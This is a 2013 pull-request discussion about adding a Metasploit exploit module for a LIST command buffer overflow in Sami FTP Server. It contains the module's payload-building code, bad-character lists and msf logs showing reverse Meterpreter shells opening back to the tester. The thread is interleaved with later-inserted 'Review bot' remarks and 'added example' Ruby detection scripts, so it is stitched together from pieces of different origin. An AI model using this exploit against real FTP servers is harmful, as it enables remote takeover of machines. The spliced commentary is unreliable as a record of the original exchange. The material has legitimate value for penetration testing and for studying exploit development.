Added module for OSVDB-90815 #1609

Merged
merged 1 commit into from Mar 19, 2013

3 participants
Contributor

dougsko commented Mar 15, 2013

Thanks a lot for the feedback! Hopefully this is looking a little better now.

Contributor

jvazquez-r7 commented Mar 15, 2013

Thanks, looking into it!

Contributor

jvazquez-r7 commented Mar 15, 2013

It isn't working for me:

msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS  msf              no        The password for the specified username
   FTPUSER  msf              no        The username to authenticate as
   RHOST    192.168.1.133    yes       The target address
   RPORT    21               yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...

The network capture:


220-
220 Features p a .
USER msf
331 Password required.
PASS msf
230 Access allowed.
LIST .$-3......CA=.....C......}!....D.".....n.../........lYs8..r...UJT.......8.}..:kR.=...q....c....YM$.......u(.bwT:.K..9.F.(...k(..x.U...t.........z..MzA..?..f........@$...`fn....?6..1...Hl.'..[.....X..B.5..O......Dg..Y.......INr..*....B....f,.}|~1.x%t.5zpur'.Nw(.....O.qsF....:...-K=.A..I.y4...$.........@..G9./.H.?.!.....7J.vC...{g..<...H.pFuy..s~?t'..z$.....8.i.....N..".f<..x7..-...@....=O...rg..Kw.....;.q5..v,.{2.....|/G.C4...%.....I.A}BJ.3.yvx}0..~)..O....r........<,...=|tf...%F.A...$..Jw'.B...qu..{@s......CH1...p-.N...Iz5G4.....?...../g..Kw7...F...s|k..f..zq-tx..O.J.K.%..4..,.......5.y'..@}uB..Hp?/A....)..$vIg=.N~9...;....<.....r.7G{C2......r/~xC!.vO}...y...{|ui....@......w,p$.zH...3..gqf.....=.........t8...#.NB..IK4-.A.....s<......Gq5v7s....?p*.F}+.|%~J.y..u'....r..{"./.Cw0...J.t-z7.....I...Hf.x(.....F,.K...N5.B..:..?g...A.$.<=@G'O...%..4......1....t$.[1..K1C..C....3Zu..W./.p.....Y...>a..4'........+.....+.o........Y.y9......H1.B......~.H...p.Q....n.&p...I.....0.T..<#V..3.v..0..`..:.R..}<..R6..U...q=...d.b%v.......^...`#k...46....;].d.....fC..O..eo9.6.....B../.....M.m.9...;..^...N.....B..j/.|...t..+u..........T.....Z....n...o..to.l,<.s.P7.....i...6P1...|.}.l]
150 Opening data connection.

Tested with the SAMI FTP Server downloaded from exploit-db:

http://www.exploit-db.com/wp-content/themes/exploit/applications/83328fbf45b3ecd1cae18c2c2c75e31d-SamiFTPServer2.0.1.exe
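The capture above shows what the oversized LIST argument looks like on the control channel. As an added example, not part of this pull request or of the Metasploit module, the following Ruby script scans the client side of such a capture and flags commands whose argument is abnormally long or carries non-printable bytes; the session data and the 256-byte threshold are constructed here for illustration.

```ruby
# Added example: detect overflow-style FTP commands on the control channel.
# Flags client commands whose argument is unusually long or contains bytes
# outside printable ASCII, which is what the LIST line in the capture looks
# like on the wire.

MAX_ARG_LEN = 256 # assumed threshold; tune for the environment

# One FTP client command line, split into verb and argument.
Command = Struct.new(:verb, :arg)

# Parse the client side of a control-channel capture. Lines are separated
# by CRLF or LF; server replies (three-digit code) are skipped.
def parse_client_commands(raw)
  raw.b.split(/\r?\n/).each_with_object([]) do |line, cmds|
    next if line =~ /\A\d{3}[ -]/ # server reply, e.g. "220 ..." or "220-"
    verb, arg = line.split(' ', 2)
    next if verb.nil? || verb.empty?
    cmds << Command.new(verb.upcase, arg.to_s)
  end
end

# Number of bytes in arg that are not printable 7-bit ASCII.
def non_printable_count(arg)
  arg.each_byte.count { |b| b < 0x20 || b > 0x7e }
end

# Return one finding per suspicious command.
def suspicious_commands(raw, max_len: MAX_ARG_LEN)
  parse_client_commands(raw).each_with_object([]) do |cmd, findings|
    reasons = []
    reasons << "argument length #{cmd.arg.bytesize} > #{max_len}" if cmd.arg.bytesize > max_len
    np = non_printable_count(cmd.arg)
    reasons << "#{np} non-printable bytes" if np > 0
    next if reasons.empty?
    findings << { verb: cmd.verb, length: cmd.arg.bytesize, reasons: reasons }
  end
end

# Constructed 600-byte blob standing in for the binary LIST argument. It
# avoids NUL, CR, LF, space and 0xff, the same bytes an encoded payload for
# this protocol would have to avoid, so the line structure stays intact.
BLOB = (1..700).map { |i| (i * 37 + 11) % 256 }
               .reject { |b| [0x00, 0x0a, 0x0d, 0x20, 0xff].include?(b) }
               .first(600).pack('C*')

# Constructed sample session: benign login followed by the malformed LIST.
SAMPLE_SESSION = [
  "220-", "220 Features p a .",
  "USER msf", "331 Password required.",
  "PASS msf", "230 Access allowed.",
  "LIST " + BLOB,
  "150 Opening data connection."
].map(&:b).join("\r\n".b)

if __FILE__ == $0
  suspicious_commands(SAMPLE_SESSION).each do |f|
    puts "#{f[:verb]} (#{f[:length]} bytes): #{f[:reasons].join(', ')}"
  end
end
```

Only the LIST line is reported; USER and PASS carry short printable arguments and pass silently. The length threshold is the knob to adjust for directories with genuinely long path arguments.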

Contributor

jvazquez-r7 commented Mar 15, 2013

btw, no crash on the PMSystem.exe process

Contributor

jvazquez-r7 commented Mar 15, 2013

After some tests, the vulnerability is only triggered in my testing when I visit the "Log" tab in the server managing interface. But still it isn't working.

I'm testing on Windows XP SP3 / SamiFTPServer 2.0.1.

Anyway, if you aren't able to trigger the overflow without the user visiting the "Logs" tab in the managing interface, it must be clarified in the description.

Also it should work reliably :)

  • The crash here:
0:004> g
(948.6d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=81a53a0f esp=0139f910 ebp=cb1f5bc5 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
81a53a0f ??              ???
0:004> !exchain
0139f9e8: 4a251443
Invalid exception stack at 77d503b7
0:004> g
(948.6d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=4a251443 edx=7c9032bc esi=00000000 edi=00000000
eip=4a251443 esp=0139f540 ebp=0139f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
4a251443 ??              ???

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ 'References' =>
+ [
+ [ 'OSVDB', '90815'],
+ [ 'EDB', '24557'],
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 955,
+ 'BadChars' => "\x00\x0a\x0d\x20\xff",
+ 'StackAdjustment' => -3500,
+ },
+ 'Targets' =>
+ [
+ [
+ 'Windows Universal',
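Review bot: the single target is named 'Windows Universal' while the thread only records testing on Windows XP SP3; name the target after what was actually tested, since the hard-coded return address and the absence of DEP are properties of that one platform rather than of Windows in general. The 'BadChars' list "\x00\x0a\x0d\x20\xff" should also be confirmed against the LIST handler and the log path, given that the instability discussed later in the thread is attributed to badchars.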
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

Is it true? Which versions of Windows did you try?

@dougsko

dougsko Mar 15, 2013

Contributor

I tried only Windows XP SP3, however since I'm using a JMP address from the application itself, I thought that would make it universal. If I should be more specific, I'm happy to change it.

@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

Mainly I guess some memory protections will apply in other operating systems, such as DEP, which would make your exploit fail.

@wchen-r7

wchen-r7 Mar 19, 2013

Contributor

That's true. It's best to rename your target as Windows XP instead of universal. Normally we don't really call a module universal unless it's really been tested on all of them.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ [ 'OSVDB', '90815'],
+ [ 'EDB', '24557'],
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 955,
+ 'BadChars' => "\x00\x0a\x0d\x20\xff",
+ 'StackAdjustment' => -3500,
+ },
+ 'Targets' =>
+ [
+ [
+ 'Windows Universal',
+ {
+ 'Platform' => 'win',
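Review bot: 'Platform' => 'win' inside the target entry duplicates the module-level 'Platform', and with a single target there is nothing to differentiate, so the per-target key can be dropped.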
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

It isn't needed here because you're targeting just one platform; it can be deleted.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Ftp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+ 'Description' => %q{
+ A buffer overflow is triggered when a long LIST
+ command is sent to the server and the user views the Log tab.
+ },
+ 'Platform' => 'Windows',
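Review bot: 'Platform' => 'Windows' should be 'win', the identifier the framework uses for the Windows platform. Since the 'Description' states the overflow only fires when a user views the Log tab, that user-interaction requirement should also be weighed when choosing the Rank, which is currently NormalRanking.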
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

'win', no 'Windows'

@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 27 2013'))
+ end
+
+ def exploit
+ connect_login
+
+ buf = rand_text(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V')
+ buf << payload.encoded
+
+ send_cmd( ['LIST', buf], false )
+
+ handler
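Review bot: the trailing `handler` call is redundant, as the exploit mixin already starts the handler after `exploit` returns; drop it. The fixed `target['Offset']` also assumes a constant prefix in front of the buffer, but the crash dump later in the thread shows the client address and 'LIST ' logged immediately before the payload, so the padding shifts with the length of the source address; either account for that length when computing `buf` or expose the address as an option. And since login turned out not to be required, `connect_login` can become `connect`.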
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

In fact, it isn't needed, can be deleted.

@dougsko

dougsko Mar 15, 2013

Contributor

I'm sorry, I'm not sure I understand what you are referring to here.

@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

The word "handler" can be deleted, the stuff is handled by Exploit indeed :P

Contributor

dougsko commented Mar 15, 2013

Thanks for testing. You're right in that you need to view the Logs tab in order for this to work. Right now, the description says:

A buffer overflow is triggered when a long LIST command is sent to the server and the user views the Log tab.

So that detail is in there, but if you think the wording could use some work, I'm happy to make the edits.

It also seems that I do need to explicitly set the EXITFUNC to either seh or thread. I was under the impression that thread was the default, but it looks like I was wrong.

msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS  ftp              no        The password for the specified username
   FTPUSER  ftp              no        The username to authenticate as
   RHOST    10.1.0.30        yes       The target address
   RPORT    21               yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     10.1.0.10        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > exploit

[*] Started reverse handler on 10.1.0.10:4444
[*] Connecting to FTP server 10.1.0.30:21...
[*] Connected to target FTP server.
[*] Authenticating as ftp with password ftp...
[*] Sending password...
[*] Sending stage (752128 bytes) to 10.1.0.30
[*] Meterpreter session 3 opened (10.1.0.10:4444 -> 10.1.0.30:1090) at 2013-03-15 14:45:32 -0400

meterpreter >

I do have a question for you as well: FTPUSER and FTPPASS already come free as options with the FTP module, however they are not required. I need to set them to be required but was wondering if there was a better way to do that instead of declaring them as brand new options with OptString. What do you think?

[EDIT] It turns out that valid credentials are not actually required. I am still curious to know what the "correct" way of changing the options' attributes are though.

Contributor

jvazquez-r7 commented Mar 15, 2013

Still not working:

msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...

The default EXITFUNC is process; anyway, it refers to the exit method once the payload has been executed. Atm in my tests the payload isn't being executed at all because the exploit is not gaining execution.

The crash if I debug:

(5d0.f6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=d8ebedd7 esp=0119f910 ebp=536f03f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
d8ebedd7 ??              ???
0:004> !exchain
0119f9e8: 923d732f
Invalid exception stack at 48709115
0:004> g
(5d0.f6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=923d732f edx=7c9032bc esi=00000000 edi=00000000
eip=923d732f esp=0119f540 ebp=0119f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
923d732f ??              ???

Contributor

dougsko commented Mar 15, 2013

That's weird, it's working every time for me. However I did see the same sort of behavior if the payload was too big. I dropped the size a bit to make extra sure everything would fit properly. Previously, I had it exactly as large as I could make it and still get everything to work. Also, and this might really be the issue - before actually kicking off the exploit, I already have the Logs tab open in the GUI. Hopefully, that'll do the trick and if that ends up being the key, I'll be sure to add that into the description. Thanks again for all your time and advice!

Contributor

jvazquez-r7 commented Mar 15, 2013

New test, still not working; remember EIP isn't controlled in my tests at all:

msf > use exploit/windows/ftp/sami_ftpd_list 
msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > set FTPPASS msf
FTPPASS => msf
msf  exploit(sami_ftpd_list) > set FTPUSER msf
FTPUSER => msf
msf  exploit(sami_ftpd_list) > set RHOST 192.168.1.133
RHOST => 192.168.1.133
msf  exploit(sami_ftpd_list) > set VERBOSE true
VERBOSE => true
msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...
msf  exploit(sami_ftpd_list) > 

The crash if I debug:

0:005> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=7c0442ad esp=0119f910 ebp=907ce97c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
7c0442ad ??              ???
0:004> !exchain
0119f9e8: 1442754e
Invalid exception stack at 71d4221d
0:004> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=1442754e edx=7c9032bc esi=00000000 edi=00000000
eip=1442754e esp=0119f540 ebp=0119f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
1442754e ??              ???

BTW: Are you sure the length of the overflow isn't dependent on variable-length data such as the attacker IP? It's what I see around ESP at the moment of the crash:

0:005> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=7c0442ad esp=0119f910 ebp=907ce97c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
7c0442ad ??              ???
0:004> db esp
0119f910  83 c7 c0 e1 76 3d 30 fe-c6 c1 e2 67 b0 b7 77 7b  ....v=0....g..w{
0119f920  4a 9f 97 14 be 7f 28 eb-34 04 42 27 4f a9 10 d4  J.....(.4.B'O...
0119f930  bf 9b 96 88 e0 39 f8 ba-92 b2 25 89 d6 a8 3f 72  .....9....%...?r
0119f940  71 76 29 e0 70 15 b2 9f-81 e2 48 a8 93 2c 85 f7  qv).p.....H..,..
0119f950  d3 e3 4b 78 75 74 7c 7d-27 0c 67 24 8d b0 b9 14  ..Kxut|}'.g$....
0119f960  66 47 97 96 42 12 d5 b6-9b 73 46 7f 01 eb 1b f5  fG..B....sF.....
0119f970  3d be 80 d6 7a 41 40 b5-03 fc 79 4a 7b 05 b1 3f  =...zA@...yJ{..?
0119f980  37 b4 25 35 2f bf 4e 49-1a f9 4f ba 02 f6 e1 77  7.%5/.NI..O....w
0:004> db esp -100 l100
0119f810  31 39 32 2e 31 36 38 2e-31 2e 31 32 38 20 2d 20  192.168.1.128 - 
0119f820  4c 49 53 54 20 77 c6 df-dc cf 93 ef 4d 27 cd 2a  LIST w......M'.*
0119f830  56 d1 6c 08 94 6e a9 a4-ee 78 ea 36 ac 37 f8 14  V.l..n...x.6.7..
0119f840  d7 4a bd fc 49 fb 9e 92-f8 ad ea cf 8c 01 bc 33  .J..I..........3
0119f850  e7 81 ef d5 e8 c8 2a 9a-6a be a4 d7 b6 16 02 47  ......*.j......G
0119f860  d4 b2 14 db 08 d0 72 3d-5a 2c 73 ab 04 03 11 5d  ......r=Z,s....]
0119f870  b4 36 7a c8 b5 62 c4 3c-7f c1 52 3a 2c fa 64 46  .6z..b.<..R:,.dF
0119f880  b8 e6 6f d3 cc 46 d9 1e-c3 28 4c 58 e0 29 12 17  ..o..F...(LX.)..
0119f890  97 d3 53 b9 fc 60 b3 0e-41 f9 17 9d 2c 57 82 e5  ..S..`..A...,W..
0119f8a0  91 35 07 5a fd 6c fd 73-1d ee 5b e1 40 f5 28 a1  .5.Z.l.s..[.@.(.
0119f8b0  46 2f 32 cf c2 a8 8b 7a-d6 fc db e1 2e 2d b3 29  F/2....z.....-.)
0119f8c0  95 7a 9f 1f eb a1 77 64-76 1c 7c 1c 13 35 13 96  .z....wdv.|..5..
0119f8d0  a9 39 89 55 94 a9 5d 8b-4f 97 6b 75 62 64 43 a7  .9.U..].O.kubdC.
0119f8e0  93 05 53 5d f3 21 0c df-c6 bc d5 aa 12 c5 88 17  ..S].!..........
0119f8f0  2a 87 62 3e 54 bb 3b 48-7c e9 7c 90 ad 42 04 7c  *.b>T.;H|.|..B.|
0119f900  83 82 02 10 3c 2c 22 e3-43 b4 75 7e 74 71 41 93  ....<,".C.u~tqA.
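The `db` output above is where the variable-length log prefix in front of the buffer becomes visible. As an added example, not part of this pull request, here is a Ruby helper that parses WinDbg `db` lines back into bytes and recovers that prefix; the two dump lines embedded as sample input are copied from the thread, and the helper names are my own.

```ruby
# Added example: turn WinDbg `db` output into raw bytes and recover the
# printable log prefix ("<ip> - LIST ") that the server writes in front of
# the command argument. Useful when triaging why a crash offset shifts
# between test setups with different client addresses.

# A `db` line is: 8 hex digits of address, whitespace, 16 hex bytes (bytes 8
# and 9 separated by '-'), whitespace, then an ASCII rendering we ignore.
DB_LINE = /\A([0-9a-f]{8})\s+((?:[0-9a-f]{2}[ -]){15}[0-9a-f]{2})\s/i

# Returns [start_address, binary string] for a block of db output.
# Prompts and other non-matching lines are skipped.
def parse_db_dump(text)
  start = nil
  bytes = []
  text.each_line do |line|
    next unless (m = DB_LINE.match(line))
    start ||= m[1].to_i(16)
    bytes.concat(m[2].split(/[ -]/).map { |h| h.to_i(16) })
  end
  [start, bytes.pack('C*')]
end

# Leading run of printable ASCII in a byte string.
def printable_prefix(bin)
  bin.b[/\A[\x20-\x7e]*/]
end

# Byte length of the log prefix "<ip> - LIST " for a given client address;
# this is the part of the buffer that varies with the source address.
def log_prefix_len(ip)
  "#{ip} - LIST ".bytesize
end

# Sample input: the first two data lines of the `db esp -100 l100` dump
# from the thread, preceded by the prompt line that must be ignored.
SAMPLE_DB = <<~DUMP
  0:004> db esp -100 l100
  0119f810  31 39 32 2e 31 36 38 2e-31 2e 31 32 38 20 2d 20  192.168.1.128 - 
  0119f820  4c 49 53 54 20 77 c6 df-dc cf 93 ef 4d 27 cd 2a  LIST w......M'.*
DUMP

if __FILE__ == $0
  start, bin = parse_db_dump(SAMPLE_DB)
  puts format('dump starts at %08x, %d bytes', start, bin.bytesize)
  puts "prefix before random data: #{printable_prefix(bin).inspect}"
  %w[192.168.1.128 10.1.0.10].each do |ip|
    puts "log prefix for #{ip}: #{log_prefix_len(ip)} bytes"
  end
end
```

For the two addresses used in this thread the prefix differs by four bytes, which is enough to move a fixed-offset return address off its slot; that is why the same module behaves differently between the two test networks.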

Contributor

dougsko commented Mar 15, 2013

That's a really good point, I hadn't thought of that. Let me try it with a few different IP lengths and under some different VM images and see what I can find.

jvazquez-r7 referenced this pull request in dougsko/metasploit-framework Mar 19, 2013

Merged

cleanup for sami_ftpd_list #1

Contributor

jvazquez-r7 commented Mar 19, 2013

Hi @dougsko,

The submission is still unstable because of badchars and/or sometimes the decoder crashing. I've tried to make it more stable and sent a pull request to your repo: dougsko#1

I've tried to make it more stable:

  • Finishing badchars analysis
  • Disabling nops before payload (they aren't needed in fact)
  • Stackpivoting before the encoder

Also I've noticed login isn't needed to exploit, so I've switched from connect_login to connect. Finally, a little module cleanup.

Feel free to review the changes and ask anything. Once you're comfortable with the changes, feel free to merge the pull request into your repo, so this one will be updated automatically and we'll be mainly ready to merge :)

Thanks!

Contributor

jvazquez-r7 commented Mar 19, 2013

Awesome! Thanks @dougsko, merging!

Contributor

jvazquez-r7 commented Mar 19, 2013

btw, last testing result:

msf > use exploit/windows/ftp/sami_ftpd_list 
msf exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   FTPPASS   mozilla@example.com  no        The password for the specified username
   FTPUSER   anonymous            no        The username to authenticate as
   RHOST                          yes       The target address
   RPORT     21                   yes       The target port
   SOURCEIP                       no        The local client address


Exploit target:

   Id  Name
   --  ----
   0   Sami FTP Server 2.0.1 / Windows XP SP3


msf exploit(sami_ftpd_list) > set rhost 192.168.1.133
rhost => 192.168.1.133
msf exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Sending stage (752128 bytes) to 192.168.1.133
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.133:1363) at 2013-03-19 21:29:23 +0100

meterpreter > exit -y

jvazquez-r7 merged commit 8611109 into rapid7:master Mar 19, 2013

1 check passed

The Travis build passed
Contributor

dougsko commented Mar 19, 2013

Looks great. Thanks for all of your improvements.

Contributor

jvazquez-r7 commented Mar 20, 2013

np, thank you for your collaboration :)

dougsko deleted the dougsko:osvdb-90815 branch Mar 21, 2013
